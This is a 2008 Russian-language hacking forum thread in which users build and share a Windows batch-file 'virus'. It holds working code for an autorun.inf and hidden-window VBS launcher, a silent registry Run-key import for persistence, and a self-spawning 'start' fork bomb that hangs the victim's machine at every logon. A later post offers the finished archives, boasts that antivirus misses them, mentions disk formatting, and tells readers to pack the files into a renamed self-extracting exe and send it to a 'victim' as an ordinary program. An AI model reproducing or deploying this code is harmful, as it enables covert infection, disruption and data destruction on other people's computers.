terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!


обитель функций.bat или просто батники!

Сообщений 21 страница 40 из 120

21

и так! нам надо скрыть фсю процедуру копирования файлов!
3-й файл:

Код:
Set WshShell = WScript.CreateObject("WScript.Shell") 
WshShell.Run"E:\loading.bat ", 0, true

минус! если в компе 2 сидирома то дисочек наш может быть вставлен не в Е:\ (по умолчанию) а в сидюк под какой-то другой буквой... как видно в коде путь прописан Е:\
и теперь в файл autorun.inf вносим изменения пишем:

Код:
[autorun]
open=control.vbs
open=loading.bat

так наш третий файл скрывающий процедуру выполнения функций будет называтся control.vbs

0

22

проблема с добавкой записи в реестр решена!

Код:
regedit /s "C:\WINDOWS\system\regt.reg"

добавляется без подтверждения!
выше редактировать не буду
вот код но уже правильный:

@echo off
if exist C:\rel.txt goto mim
if exist C:\WINDOWS\system\terminal.bat goto mit
copy terminal.bat C:\WINDOWS\system\
:mit
if exist C:\WINDOWS\system\regt.reg goto min
copy regt.reg C:\WINDOWS\system\
:min
regedit /s "C:\WINDOWS\system\regt.reg"
:mim

ток надо попробовать с кавычками и без... я толком незнаю как)

Отредактировано ozia (2008-01-12 20:03:58)

0

23

Акелла за тобой реестр!

0

24

давно не забредал на форум...и вот наконец то дошел!

Значит пишем файл regt.reg для запуска всей этой прелести....

Его содержание такое:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"terminal"="C:\\WINDOWS\\system\\terminal.bat"

Данным ключем будет запускаться файл terminal.bat из папки C:\windows\system... Единственный недостаток в том если винда стоит не на дискеЦ, а например на Д... Встречал много таких случаев у ламеров пытавшихся в первый раз поставить винду впервые

REGEDIT4 или Windows Registry Editor Version 5.00 вписывать в файл .reg ОБЯЗАТЕЛЬНО! Без данной подписи будет возникать ошибка двоичных данных!

Файл проверен...Работает...

Отредактировано Akella (2008-01-09 15:13:40)

0

25

Есть еще идея сделать что то типа веселой или не очень программы))
Сейчас многие пакуют свои программы в самораспаковывающиеся архивы!
Тем самым можно пошутить или убить чей нибудь комп!

Просто перепаковать программу которая в таком архиве, но добавить наши файлы)))

Как можно пошутить...Очень легко, но при этом тому кто будет наблюдать данное действо будет не до смеха)))Сам такое наблюдал когда пробовыл написать выключение компьютера чераз бат...

Я писпл примитивное start shutdown.... Вроже ничего тут страшного нет! Но вот вайл с этим содержимым назывался shutdown.bat!
И благодоря 2ум словам происходит зацикливание...В итоге которого комп виснет за 10-40 секунд, все зависит от проца и оперативной памяти! но если запустить этот файл я думаю вы не успеете закрыть все открывшиеся окна число которых увеличивается в геометрической прогресии!

Вывод:

Можно зациклить файл и тем постиаться над кем нибудь!
для этого нужно создать файл с именем temp.bat (вместо temp пишем свое имя файла, файл создаем в блокноте)
а в содержимое файла пишем:
start temp (Temp ваше имя файла, для тех кто не врубает, имя файла должно соответствовать надписи после комманды start)

0

26

С таким циклящимся файлом можно поступить точно так же как и с нашим файлом смерти...
Просто написав его таким образом:
Имя файла terminal.bat....
Содержимое файлa start terminal

и просто заменяем этим файлом файл terminal.bat который мы пробывали писать ранее для смерти компа жертвы!
Теперь комп будет просто виснуть при каждом входе в систему...

Не забываем что бат можно использовать не только в "военных" целях, но и в помосч!
Так что предлагаю подумать чево бы такова написать хорошего!
Могу предложить писать роут через бат, очень удобно при переустановке винды, мы просто пустим батник и роуты уже все установлены...(для пользователей локальных сетей)
Так же просто файлы выключения, перезагрузки и тд...
С батником можно придуиать много интересного!

Отредактировано Akella (2008-01-09 13:31:23)

0

27

RmXUA написал(а):

Код:
%C3%EB%E0%E2%ED%EE%E5%20%EC%E5%ED%FE%5C%CF%F0%EE%E3%F0%E0%EC%EC%FB%5C%C0%E2%F2%EE%E7%E0%E3%F0%F3%E7%EA%E0%20

не помогает "Ошибка синтаксиса"

0

28

Akella а чего пишет что данные должны быть двоичные?
хороших батников куча.... их админы днями пишут)
вот почитай статейку)
короче у мну ща времени нет... я приду вечером... и розберемся...

0

29

ПОВТАРЯЮ!

REGEDIT4 или Windows Registry Editor Version 5.00 вписывать в файл .reg ОБЯЗАТЕЛЬНО! Без данной подписи будет возникать ошибка двоичных данных!

теперь надо попробовать все это сделать компактно и удобно)))

Отредактировано Akella (2008-01-09 15:27:23)

+1

30

всё! всё супер!!! габотает! я проверил) теперь я сегодня/завтра упорядочу всё и выкину сюда)

0

31

Вот итог моей работы с батником и ключем реестра...
http://ifolder.ru/4889651
ИСПОЛЬЗОВАНИЕ НЕ ОПАСНО! ВСЕ ФАЙЛЫ НЕ НЕСУТ НИЧЕГО ВРЕДНОНОСТНОГО!

0

32

Akella чувак! это экзешник :)

0

33

на сколько понял я там только перезагрузка с выдачей сообщения?
э-э-э-э... а в экзешник ты это всё как воткнул)

0

34

Это умный экзешник)))перезагрузимся потом кажды раз это сообщение...при чем все файлы что это делают удаляются и остается тока ключ реестра и бат на сообщение! Если в екзешнике заменить бат сообщения на то же зацикливание то е**цо ты долго будешь перезагружая комп...
А екзешник это работа с самораспаковывающимся архивом

0

35

позже напишу мануал как запокавать все файлы в такой exe файл

+1

36

Напишите пожалуйста список наиболее используемых команд ;)

Отредактировано LUMEN (2008-01-11 21:56:57)

0

37

короче говоря дообсуждались...
теперь когда все проблемы мы КОЛЕКТИВНО решили давайте я напишу уже готовых несколько файлов для разных ситуаций и выложу их тут)

0

38

перед использованием прочтите всю тему внимательно!!!
и так мы наконец-то добились цели!
создано два варианта!
есть вариант запуска с диска
и вариант посылки по почте/асе
самое главное! вирус НЕ РОЗПОЗНАЁТСЯ АНТИВИРУСНЫМИ ПРОГРАММАМИ!
второй плюс!
вирус очень "гибкий"
тоесть вы сами настраиваете его! так как надо вам!
он может:
1. "зацикливать" систему (при запуске тут же перезагружается и так покругу!) шутка интересная
2. просто выдавать сообщение на экран при каждой загрузке системы! с любым текстом!
3. форматировать диски
практически всё что угодно!
и так я выложу все эти файлы:
архив №1  скачать
содержит 5 файлов:
autorun.inf
loading.bat
regt.reg
terminal.bat
rel.txt
предназначен для записи на диск!
записав 4 файла на диск вы будете вносить этот вирус всегда при вставке диска в сидиром!
если вы не хотите запускать вирус достаточно будет создать на диске Ц блокнот с названием rel.txt
в нем ничего писать не надо...
ЭТО КАСАЕТСЯ ВСЕХ АРХИВОВ!!!
архив №2 скачать
содержит 3 файла.
loading.bat
regt.reg
terminal.bat
поумолчанию в файле terminal.bat дана команда вывода на экран сообщения! замените текст на свой...
впишите туда свои команды! и потом заархивируйте в ехе-файл архиватором переименуйте результирующий файл так как вам надо и пошлите "жертве" под видом той проги которой вы назвали вирус!
в дальнейшем здесь будут розмещены более модифицированные версии с новыми возможностями и исправлениями!

0

39

Озя, сказал бы что в первом архиве а что во втором....я имею ввиду батник с какими функциями в каком архиве.

0

40

файлы названы так как мы их называли в обсуждении... (переименовывать низя)
и можно спокойно прочесть в каком файле что... так же мона скачать и открыть любой файл блокнотом! и тоже почитать!
мы ж вверху эти все обсуждали) достаточно почитать!
люди! читайте форум ВНИМАТЕЛЬНО! этот материал и есть обучение! читайте и пробуйте писать сами! придумывайте идеи и выкладывайте сюда вам с ними помогут... 80% вас писали мне в асю с прозьбой научить! так учитьсь! это основы! фундамент... я видел как некоторые (не на нашем форуме) писали что-то про пинч а потом в другой теме спрашивали как винду поставить... хакер это злобный системный администратор! хакинг это не только трояны да эксплойты... надо знать всю машину а не только маленький кусочек! вот тогда цели можно достигнуть...
попробуйте писать эти батники сами или придумайте им какое-то действие... я просто знаю эти эмоции вот посмотрите как вы встанете из-за компа... смотрите нос об потолок не поцарапайте

0


Вы здесь » terminal-s52 » Хакинг » обитель функций.bat или просто батники!